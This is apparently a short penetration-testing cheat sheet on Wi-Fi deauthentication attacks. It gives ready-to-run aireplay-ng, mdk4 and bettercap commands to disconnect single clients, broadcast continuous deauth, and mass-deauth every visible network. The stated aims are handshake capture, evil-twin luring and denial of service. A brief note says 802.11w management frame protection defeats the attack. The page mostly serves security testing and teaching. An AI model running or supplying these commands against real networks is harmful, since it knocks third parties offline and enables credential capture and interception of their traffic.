Deauthentication Attacks

Exploitation

Deauthentication frames can disconnect clients from a network. This is used to capture handshakes, force clients to roam to an evil twin, or cause denial of service.

Aireplay-ng

Deauthenticate a single client.

01-single-deauth.sh
bash 
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon

Broadcast deauth to all clients (continuous).

02-broadcast-deauth.sh
bash 
sudo aireplay-ng -0 0 -a AA:BB:CC:DD:EE:FF wlan0mon

MDK4

MDK4 is more powerful. Deauthenticate a specific AP.

03-mdk4-target.sh
bash 
echo "AA:BB:CC:DD:EE:FF" > target.txt
sudo mdk4 wlan0mon d -b target.txt

Mass deauth all visible networks (DESTRUCTIVE!).

04-mdk4-mass.sh
bash 
sudo mdk4 wlan0mon d

Bettercap

Deauth using Bettercap.

05-bettercap-deauth.sh
bash 
sudo bettercap -iface wlan0mon
> wifi.recon on
> wifi.deauth AA:BB:CC:DD:EE:FF

Note on 802.11w

802.11w (Management Frame Protection) defeats deauthentication attacks by encrypting management frames. Modern networks and clients may have MFP enabled, rendering these attacks ineffective.

Related Topics

Wireless Pentesting

WEP Cracking

Wireshark Cheatsheet